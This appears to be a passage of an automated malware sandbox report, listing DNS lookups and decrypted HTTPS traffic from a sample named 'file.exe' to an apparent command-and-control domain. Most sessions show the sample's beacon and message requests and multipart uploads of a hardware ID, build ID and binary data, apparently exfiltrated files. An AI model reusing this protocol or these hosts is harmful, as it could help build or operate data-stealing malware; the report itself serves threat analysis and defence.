Jan 4, 2025 22:58:07.472575903 CET	1.1.1.1	192.168.2.4	0xa231	No error (0)	tirepublicerj.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 22:58:07.472575903 CET	1.1.1.1	192.168.2.4	0xa231	No error (0)	tirepublicerj.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 22:58:07.472575903 CET	1.1.1.1	192.168.2.4	0xa231	No error (0)	tirepublicerj.shop	104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tirepublicerj.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	104.21.64.1	443	6664	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 21:58:08 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tirepublicerj.shop
2025-01-04 21:58:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-04 21:58:08 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 21:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n9qcie9qjbkd949e6ad63hjqhh; expires=Wed, 30 Apr 2025 15:44:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvQdPnEpODhOcgqlsRGGw%2FD9TBCPD2zfHBNrwJqhy5VN7FaIqKWKbmPcbw%2B3OfIghAZQBTtH3rkFYvRFR0Oo%2BfCnccck2YS%2BCwDhKUxgwld9jz5gxPhfZv7wuaxKkmhUOEwnKr8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fce7cfd186dc358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25236&min_rtt=1695&rtt_var=14693&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1722713&cwnd=155&unsent_bytes=0&cid=a2ee32fb96d1c7ad&ts=530&x=0"
2025-01-04 21:58:08 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-04 21:58:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	104.21.64.1	443	6664	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 21:58:09 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: tirepublicerj.shop
2025-01-04 21:58:09 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 58 70 4c 59 33 32 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=XpLY32--&j=
2025-01-04 21:58:09 UTC	1135	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 21:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dpu6gp4igl3kbcofmgg0jlc3bh; expires=Wed, 30 Apr 2025 15:44:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Al5Q1z2NH4%2FCoo%2Bgj9KRUDzleasrcRbEXtl65D0QbZKEncPSmdZjeed906PEi0wCvfaVor5FSJPEDn6pri8X4UsH%2BozXyAoL2%2FHvdVBZaPrn1Jw%2BRPnk%2Fr5ewH%2BOzNhxEymbMBo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fce7d02db3a4414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1705&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=944&delivery_rate=1625835&cwnd=172&unsent_bytes=0&cid=00eff47a09584cb3&ts=478&x=0"
2025-01-04 21:58:09 UTC	234	IN	Data Raw: 63 34 32 0d 0a 2b 31 73 51 34 71 41 76 34 43 35 48 74 75 54 55 5a 34 39 38 35 6e 6f 62 74 35 6a 6a 6d 43 36 70 4d 48 62 4d 53 61 74 46 6a 37 65 41 65 57 62 41 6d 68 76 4d 44 44 54 54 78 75 34 54 2f 51 6d 44 56 6a 6e 57 2f 4d 47 69 53 4d 68 63 42 61 6c 6c 69 54 50 69 6c 63 45 39 63 59 37 54 53 73 77 4d 49 73 37 47 37 6a 7a 30 58 6f 4d 55 4f 59 32 36 68 76 4a 4d 79 46 77 55 72 53 4c 45 4e 65 50 55 6b 7a 64 33 69 73 56 4d 68 45 38 72 32 34 47 78 41 75 34 57 69 42 4e 32 33 2f 58 42 74 41 7a 4d 53 6c 54 32 61 2b 59 67 2b 39 61 32 4f 6d 4f 4a 67 6c 4c 4d 56 57 58 54 69 76 5a 64 72 52 32 44 47 48 66 52 2f 49 6a 77 52 73 46 55 46 61 67 6a 32 79 7a 70 33 35 4d 35 64 49 76 50 52 5a 42 43 49 64 79 4b 74 Data Ascii: c42+1sQ4qAv4C5HtuTUZ4985nobt5jjmC6pMHbMSatFj7eAeWbAmhvMDDTTxu4T/QmDVjnW/MGiSMhcBalliTPilcE9cY7TSswMIs7G7jz0XoMUOY26hvJMyFwUrSLENePUkzd3isVMhE8r24GxAu4WiBN23/XBtAzMSlT2a+Yg+9a2OmOJglLMVWXTivZdrR2DGHfR/IjwRsFUFagj2yzp35M5dIvPRZBCIdyKt
2025-01-04 21:58:09 UTC	1369	IN	Data Raw: 77 6a 75 58 73 70 59 66 73 32 36 32 62 6f 66 2b 56 45 46 76 7a 37 45 4e 2b 75 56 68 6e 64 72 77 4d 56 42 77 68 52 6c 33 49 71 34 41 4f 34 52 67 78 6c 35 78 2f 57 42 2b 55 54 44 56 68 36 68 4a 4d 59 70 35 39 4b 52 4d 48 57 50 78 55 57 45 51 79 61 55 79 50 59 43 39 56 37 63 57 46 6e 46 2b 59 4c 75 51 64 6f 53 43 2b 41 79 69 53 44 68 6c 63 46 35 64 49 37 44 51 49 4a 65 4c 64 2b 4e 73 78 66 6d 46 34 6b 56 65 64 6a 77 6a 76 6c 4d 7a 46 67 65 6f 53 48 4e 4b 75 44 54 6d 54 6b 79 7a 6f 4a 4b 6d 67 78 39 6c 4b 57 7a 46 65 6f 53 6b 6c 70 44 6c 65 58 50 34 77 7a 4d 58 6c 54 32 61 38 45 69 37 74 61 53 4e 6e 47 49 79 56 2b 43 58 69 50 5a 67 36 51 44 36 42 43 4f 47 32 76 66 39 49 66 35 52 63 42 62 45 61 6b 76 69 57 6d 74 30 6f 46 35 4b 73 44 6a 51 49 6c 41 4c 38 4f 47 Data Ascii: wjuXspYfs262bof+VEFvz7EN+uVhndrwMVBwhRl3Iq4AO4Rgxl5x/WB+UTDVh6hJMYp59KRMHWPxUWEQyaUyPYC9V7cWFnF+YLuQdoSC+AyiSDhlcF5dI7DQIJeLd+NsxfmF4kVedjwjvlMzFgeoSHNKuDTmTkyzoJKmgx9lKWzFeoSklpDleXP4wzMXlT2a8Ei7taSNnGIyV+CXiPZg6QD6BCOG2vf9If5RcBbEakviWmt0oF5KsDjQIlAL8OG
2025-01-04 21:58:09 UTC	1369	IN	Data Raw: 79 45 46 47 76 5a 38 49 66 31 51 63 63 53 57 75 34 73 30 57 65 31 6c 62 4d 36 5a 6f 50 49 44 37 64 50 4b 39 71 42 6f 45 58 79 55 4a 31 59 66 74 6d 36 32 62 70 42 79 6c 6f 53 76 43 54 45 4a 4f 50 62 6c 6a 78 39 69 4d 4a 4e 6a 30 6b 68 33 34 32 31 43 4f 6b 4d 6a 68 68 78 30 50 75 4c 38 41 79 46 45 68 4f 32 61 35 46 6e 33 4d 4b 53 65 30 65 44 7a 45 4f 46 57 6d 58 4c 79 4b 39 46 36 68 4c 45 51 44 6e 59 38 6f 54 2f 51 38 70 59 47 71 73 68 78 53 2f 6a 31 6f 73 32 64 6f 44 4f 52 59 68 42 4b 39 43 4f 76 77 37 6d 47 49 51 5a 63 35 57 30 77 66 31 55 69 77 70 55 6d 69 7a 46 4b 75 4b 58 72 44 70 38 6a 73 56 62 77 6c 4e 72 7a 63 61 78 43 61 31 47 78 42 52 77 31 66 47 4c 2f 6b 7a 4d 58 78 47 74 4c 4d 6f 71 36 74 2b 58 50 6e 61 4d 79 30 43 45 54 43 4c 51 67 36 51 41 35 Data Ascii: yEFGvZ8If1QccSWu4s0We1lbM6ZoPID7dPK9qBoEXyUJ1Yftm62bpByloSvCTEJOPbljx9iMJNj0kh3421COkMjhhx0PuL8AyFEhO2a5Fn3MKSe0eDzEOFWmXLyK9F6hLEQDnY8oT/Q8pYGqshxS/j1os2doDORYhBK9COvw7mGIQZc5W0wf1UiwpUmizFKuKXrDp8jsVbwlNrzcaxCa1GxBRw1fGL/kzMXxGtLMoq6t+XPnaMy0CETCLQg6QA5
2025-01-04 21:58:09 UTC	173	IN	Data Raw: 4d 32 2b 7a 42 35 51 4c 53 45 68 4f 69 61 35 46 6e 35 4e 79 4c 4e 33 79 4a 7a 30 75 4b 53 79 76 5a 6a 62 41 4f 36 68 6d 43 46 58 48 59 2f 34 4c 37 53 4d 46 41 46 36 55 68 78 43 32 74 6d 39 6b 2b 61 73 43 61 44 61 56 41 44 4d 53 64 70 42 4f 74 41 63 6f 42 4f 64 4c 32 77 61 49 4d 79 46 30 64 6f 53 50 42 4b 4f 4c 52 6c 7a 39 30 6a 63 64 43 69 46 34 74 32 6f 75 39 43 75 59 4d 68 42 56 39 32 66 36 4a 38 55 61 4c 48 46 53 70 4d 34 6c 2f 72 65 43 55 4e 6e 4b 44 31 41 32 64 41 6a 79 55 67 62 70 46 74 56 36 49 46 6e 0d 0a Data Ascii: M2+zB5QLSEhOia5Fn5NyLN3yJz0uKSyvZjbAO6hmCFXHY/4L7SMFAF6UhxC2tm9k+asCaDaVADMSdpBOtAcoBOdL2waIMyF0doSPBKOLRlz90jcdCiF4t2ou9CuYMhBV92f6J8UaLHFSpM4l/reCUNnKD1A2dAjyUgbpFtV6IFn
2025-01-04 21:58:09 UTC	1369	IN	Data Raw: 33 64 35 32 0d 0a 6e 61 39 6f 33 78 52 4d 70 65 47 71 6b 75 77 43 2f 6c 78 35 67 39 65 6f 48 4d 51 6f 4e 49 49 4e 47 43 73 51 48 72 45 63 52 57 4f 64 4c 69 77 61 49 4d 35 48 55 68 37 41 72 7a 5a 2f 4b 62 67 48 6c 31 6a 49 49 56 77 6b 41 6d 32 49 36 35 41 2b 51 53 6a 68 46 79 32 66 47 46 39 6b 58 4f 56 42 57 72 4c 73 67 6a 34 64 2b 66 4f 6e 47 50 7a 55 4b 4b 44 47 75 55 67 61 35 46 74 56 36 68 44 33 4c 62 2f 4d 48 6c 41 74 49 53 45 36 4a 72 6b 57 66 68 33 4a 38 2f 64 34 7a 44 53 34 70 4a 4c 64 43 48 73 41 50 75 45 59 41 64 65 4e 72 2b 6a 66 52 47 79 6c 4d 59 70 53 54 43 49 71 32 62 32 54 35 71 77 4a 6f 4e 73 30 38 7a 77 35 61 36 52 66 4a 51 6e 56 68 2b 32 62 72 5a 75 6b 33 5a 57 42 36 67 4c 73 59 69 37 74 71 65 4e 48 53 4d 79 45 53 4b 53 69 72 64 6c 4c 55 Data Ascii: 3d52na9o3xRMpeGqkuwC/lx5g9eoHMQoNIINGCsQHrEcRWOdLiwaIM5HUh7ArzZ/KbgHl1jIIVwkAm2I65A+QSjhFy2fGF9kXOVBWrLsgj4d+fOnGPzUKKDGuUga5FtV6hD3Lb/MHlAtISE6JrkWfh3J8/d4zDS4pJLdCHsAPuEYAdeNr+jfRGylMYpSTCIq2b2T5qwJoNs08zw5a6RfJQnVh+2brZuk3ZWB6gLsYi7tqeNHSMyESKSirdlLU
2025-01-04 21:58:09 UTC	1369	IN	Data Raw: 42 78 30 31 65 69 4f 2f 55 76 43 57 51 61 6b 4c 4d 34 73 35 64 36 57 50 32 43 4d 7a 46 2b 48 58 6a 65 55 79 50 59 43 39 56 37 63 57 45 2f 53 36 70 48 35 44 76 70 45 46 37 67 67 78 43 75 74 79 74 63 67 4d 6f 66 4f 44 64 6f 4d 49 39 75 50 74 51 72 73 46 34 67 56 66 4e 7a 2f 67 50 78 49 77 56 67 55 71 43 33 49 49 75 66 57 6d 44 4e 37 68 38 70 4b 67 56 35 6c 6d 73 61 78 48 61 31 47 78 44 46 2b 78 2f 53 52 75 6c 4f 46 53 31 53 70 4a 34 6c 2f 72 64 47 54 4e 6e 61 48 7a 6b 75 48 53 69 6a 56 69 62 63 46 34 68 71 50 45 58 2f 55 39 34 54 33 53 4e 6c 59 48 36 45 6e 77 43 76 67 6c 64 64 35 64 5a 69 43 46 63 4a 39 4b 4e 71 49 73 52 4f 74 41 63 6f 42 4f 64 4c 32 77 61 49 4d 79 6c 34 62 72 53 54 4b 4a 4f 7a 66 69 79 74 2b 69 63 70 49 6a 6b 63 72 30 70 53 77 43 75 51 64 Data Ascii: Bx01eiO/UvCWQakLM4s5d6WP2CMzF+HXjeUyPYC9V7cWE/S6pH5DvpEF7ggxCutytcgMofODdoMI9uPtQrsF4gVfNz/gPxIwVgUqC3IIufWmDN7h8pKgV5lmsaxHa1GxDF+x/SRulOFS1SpJ4l/rdGTNnaHzkuHSijVibcF4hqPEX/U94T3SNlYH6EnwCvgldd5dZiCFcJ9KNqIsROtAcoBOdL2waIMyl4brSTKJOzfiyt+icpIjkcr0pSwCuQd
2025-01-04 21:58:09 UTC	1369	IN	Data Raw: 57 36 7a 37 70 64 7a 45 4e 55 39 6a 33 5a 4d 4f 72 4b 31 79 41 79 68 38 34 4e 32 67 77 6a 33 59 43 78 41 2b 4d 4d 67 52 35 32 32 76 4f 49 2f 6b 54 49 55 68 43 71 4c 4d 77 6b 34 64 36 65 4f 6e 32 45 79 30 4f 4c 51 32 57 61 78 72 45 64 72 55 62 45 4f 57 4c 57 39 6f 79 36 55 34 56 4c 56 4b 6b 6e 69 58 2b 74 32 5a 63 38 63 6f 72 45 53 59 64 4b 4c 39 47 47 76 51 62 69 47 6f 49 63 64 74 58 78 69 50 74 4b 7a 6c 67 66 71 43 62 4b 49 65 75 56 31 33 6c 31 6d 49 49 56 77 6d 77 2b 32 59 71 78 52 66 4a 51 6e 56 68 2b 32 62 72 5a 75 6b 66 48 56 68 4f 75 4a 73 6f 76 36 4e 47 54 50 48 4b 49 30 45 57 43 53 7a 66 47 68 72 38 41 34 52 32 45 48 48 2f 63 2f 49 4c 2b 44 49 55 53 45 37 5a 72 6b 57 66 41 32 5a 34 51 64 5a 75 43 55 73 78 56 5a 64 4f 4b 39 6c 32 74 48 34 38 53 64 Data Ascii: W6z7pdzENU9j3ZMOrK1yAyh84N2gwj3YCxA+MMgR522vOI/kTIUhCqLMwk4d6eOn2Ey0OLQ2WaxrEdrUbEOWLW9oy6U4VLVKkniX+t2Zc8corESYdKL9GGvQbiGoIcdtXxiPtKzlgfqCbKIeuV13l1mIIVwmw+2YqxRfJQnVh+2brZukfHVhOuJsov6NGTPHKI0EWCSzfGhr8A4R2EHH/c/IL+DIUSE7ZrkWfA2Z4QdZuCUsxVZdOK9l2tH48Sd
2025-01-04 21:58:09 UTC	1369	IN	Data Raw: 30 44 4d 6f 53 54 4a 63 79 69 54 47 74 6a 63 74 33 4d 70 4b 43 46 63 49 4c 4a 73 61 55 73 41 62 37 48 63 4d 6d 52 2f 4c 73 69 2f 31 63 7a 45 55 62 37 6d 57 4a 4b 4b 32 4e 6f 48 6c 37 68 39 6c 63 6c 45 45 31 30 38 61 4a 53 36 30 47 78 45 41 35 34 50 6d 50 39 45 76 64 51 31 6d 4a 50 63 4d 67 2f 64 4b 4f 4e 6a 4c 4f 67 6b 76 43 46 48 61 61 78 72 49 55 72 55 62 55 53 69 4b 41 71 64 61 71 48 74 51 63 44 65 34 39 69 58 2b 2f 6d 39 6b 72 4d 74 69 43 43 6f 46 65 4e 39 4b 46 6f 41 61 71 49 4c 6f 2f 59 39 6a 38 6c 75 74 79 39 56 55 4f 6f 79 33 65 4e 71 48 41 6d 6a 64 38 68 39 51 4e 7a 41 77 71 6c 4e 36 50 52 61 56 65 75 31 59 35 7a 62 72 5a 75 6e 6e 49 58 42 71 70 50 64 68 71 79 73 2b 55 50 32 57 52 67 67 50 43 53 6d 57 4d 31 50 68 46 36 51 2f 45 51 43 6d 48 6f 64 Data Ascii: 0DMoSTJcyiTGtjct3MpKCFcILJsaUsAb7HcMmR/Lsi/1czEUb7mWJKK2NoHl7h9lclEE108aJS60GxEA54PmP9EvdQ1mJPcMg/dKONjLOgkvCFHaaxrIUrUbUSiKAqdaqHtQcDe49iX+/m9krMtiCCoFeN9KFoAaqILo/Y9j8luty9VUOoy3eNqHAmjd8h9QNzAwqlN6PRaVeu1Y5zbrZunnIXBqpPdhqys+UP2WRggPCSmWM1PhF6Q/EQCmHod
2025-01-04 21:58:09 UTC	1369	IN	Data Raw: 45 68 76 75 63 2f 42 6e 70 5a 57 6d 64 7a 4b 59 67 68 58 43 65 53 62 61 69 4c 45 54 2f 46 4f 73 4f 30 50 76 75 4b 33 39 57 59 6c 6d 45 37 34 36 77 69 72 68 6c 64 64 35 64 4d 43 61 48 63 77 4d 49 63 58 47 37 6c 57 2f 52 64 46 4c 4c 6f 57 6f 6e 72 52 56 69 30 52 55 39 6e 6d 48 5a 2f 2b 56 77 58 6b 31 67 39 42 66 68 45 38 7a 31 38 47 49 4f 38 6f 51 67 78 6c 76 78 65 32 4f 78 48 4c 65 55 52 71 67 4c 4e 38 32 72 5a 76 5a 4e 6a 4c 59 2b 77 33 4b 44 42 71 61 78 71 35 46 74 56 36 78 47 33 66 62 2f 5a 66 72 41 65 78 63 45 36 38 39 32 54 44 69 6c 64 64 35 64 4d 43 61 48 38 77 4d 49 63 58 47 37 6c 57 2f 52 64 46 4c 4c 6f 57 6f 6e 72 52 56 69 30 52 55 39 6e 6d 48 5a 2f 2b 56 77 58 6b 31 67 39 42 66 68 45 38 7a 31 38 47 49 4f 38 6f 51 67 78 6c 76 78 65 32 4f 74 57 4c Data Ascii: Ehvuc/BnpZWmdzKYghXCeSbaiLET/FOsO0PvuK39WYlmE746wirhldd5dMCaHcwMIcXG7lW/RdFLLoWonrRVi0RU9nmHZ/+VwXk1g9BfhE8z18GIO8oQgxlvxe2OxHLeURqgLN82rZvZNjLY+w3KDBqaxq5FtV6xG3fb/ZfrAexcE6892TDildd5dMCaH8wMIcXG7lW/RdFLLoWonrRVi0RU9nmHZ/+VwXk1g9BfhE8z18GIO8oQgxlvxe2OtWL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	104.21.64.1	443	6664	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 21:58:10 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0BJTZMSTNMF6ZWXQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18146 Host: tirepublicerj.shop
2025-01-04 21:58:10 UTC	15331	OUT	Data Raw: 2d 2d 30 42 4a 54 5a 4d 53 54 4e 4d 46 36 5a 57 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 30 42 4a 54 5a 4d 53 54 4e 4d 46 36 5a 57 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 42 4a 54 5a 4d 53 54 4e 4d 46 36 5a 57 58 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a 2d 2d 30 42 4a 54 5a 4d 53 Data Ascii: --0BJTZMSTNMF6ZWXQContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--0BJTZMSTNMF6ZWXQContent-Disposition: form-data; name="pid"2--0BJTZMSTNMF6ZWXQContent-Disposition: form-data; name="lid"XpLY32----0BJTZMS
2025-01-04 21:58:10 UTC	2815	OUT	Data Raw: e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
2025-01-04 21:58:10 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 21:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c4pp65knsa77pju47slbq76jrj; expires=Wed, 30 Apr 2025 15:44:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HnfC7GoMcuA3LpQpsfS%2BpQhZ3rfqhDlxXMko2v9CcwhB1WzTh2Cybwfpp8sXvzeKIezJyNklK8eZk%2BtJ%2FFvvaNoJuveFRmZrDP2j27B4ulruA6j4fTdazP%2BkQLbhrtBJ3Ue6s2E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fce7d0a3cc44414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1684&rtt_var=644&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19108&delivery_rate=1683967&cwnd=172&unsent_bytes=0&cid=fd8e5e89da654b06&ts=632&x=0"
2025-01-04 21:58:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 21:58:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	104.21.64.1	443	6664	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 21:58:11 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UILB0NA6R User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8725 Host: tirepublicerj.shop
2025-01-04 21:58:11 UTC	8725	OUT	Data Raw: 2d 2d 55 49 4c 42 30 4e 41 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 55 49 4c 42 30 4e 41 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 49 4c 42 30 4e 41 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a 2d 2d 55 49 4c 42 30 4e 41 36 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 Data Ascii: --UILB0NA6RContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--UILB0NA6RContent-Disposition: form-data; name="pid"2--UILB0NA6RContent-Disposition: form-data; name="lid"XpLY32----UILB0NA6RContent-Dispositi
2025-01-04 21:58:11 UTC	1137	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 21:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ga4hofmufjoi4afsq4uv55d29i; expires=Wed, 30 Apr 2025 15:44:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LYutpRT9cJy4FjcCGUOX5O%2BdPf7bHvRWPF1BDKr%2FghyyvxPmy8EAxehuB5%2Fd7FkK%2FlxIp8bC7iDCgRjqS5vr8kw9niL0OCqS0S374qgZCQKQ%2Bra%2BVHCTiICp4Fs7aNH8H%2F9M1n4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fce7d112d4fde95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1629&rtt_var=624&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9657&delivery_rate=1733966&cwnd=242&unsent_bytes=0&cid=2da2c7c8917bafa7&ts=467&x=0"
2025-01-04 21:58:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 21:58:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	104.21.64.1	443	6664	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 21:58:12 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0HSGNRLJRUP0I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20402 Host: tirepublicerj.shop
